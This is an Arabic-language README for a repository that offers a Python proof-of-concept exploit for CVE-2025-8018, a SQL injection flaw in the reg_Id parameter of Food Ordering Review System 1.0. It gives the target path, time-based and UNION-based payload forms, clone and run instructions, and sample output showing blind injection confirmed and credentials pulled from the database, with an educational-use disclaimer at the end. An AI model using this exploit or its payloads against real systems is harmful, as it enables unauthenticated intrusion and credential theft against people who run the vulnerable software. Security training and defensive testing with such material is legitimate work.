
سكربت استغلال مكتوب بلغة Python لثغرة CVE-2025-8018، وهي ثغرة حقن SQL خطيرة في نظام Food Ordering Review System الإصدار 1.0. يساعدك هذا السكربت على اختبار الثغرة وتأكيدها واستغلالها باستخدام حقن SQL القائم على UNION والقائم على الوقت. مثالي للتدرب على مسابقات CTF والاختراق الأخلاقي وتعلّم كيفية عمل حقن SQL في العالم الحقيقي. للاستخدام التعليمي فقط.
يوفر هذا المستودع استغلالًا مكتوبًا بلغة Python لإثبات المفهوم (PoC) لـ CVE-2025-8018، وهي ثغرة حقن SQL شديدة الخطورة اكتُشفت في نظام مراجعة طلبات الطعام v1.0. تحدث الثغرة عبر المعامل reg_Id في reservation_page.php.
/user/reservation_page.phpreg_Idusers، دون مصادقةSLEEP()UNION SELECT NULL,NULL,...requestsثبّت التبعيات:
pip install requests
كيفية الاستخدام استنسخ المستودع:
git clone https://github.com/drackyjr/CVE-2025-8018.git
cd CVE-2025-8018
حدّث عنوان الهدف (URL):
افتح cve-2025-8018.py وعدّل:
TARGET_URL = "http://TARGET-IP/user/reservation_page.php" استبدل TARGET-IP بالعنوان الفعلي للنظام المستضعَف.
شغّل سكربت الاستغلال:
python3 cve-2025-8018.py
المخرجات
[*] Checking time-based SQLi with payload: 1 AND SLEEP(5)--
[+] Blind SQL injection confirmed!
[*] Testing how many columns the query expects...
[+] Looks like 3 columns work!
[*] Trying to extract data using UNION-based SQL injection...
[+] Found potential credentials in the response!
[*] Trying blind extraction fallback...
[+] Username is 7 characters long!
⚠️ إخلاء المسؤولية يُقدَّم إثبات المفهوم هذا لأغراض تعليمية فقط، مثل تحديات CTF، أو التدريب على الأمن السيبراني، أو اختبار الدفاعات على أنظمتك الخاصة.
لا تستخدم هذا ضد أي أنظمة إنتاج أو أنظمة ليس لديك إذن صريح لاختبارها. المؤلف وأي جهات مرتبطة غير مسؤولين عن سوء الاستخدام أو الأضرار الناتجة عن الكود.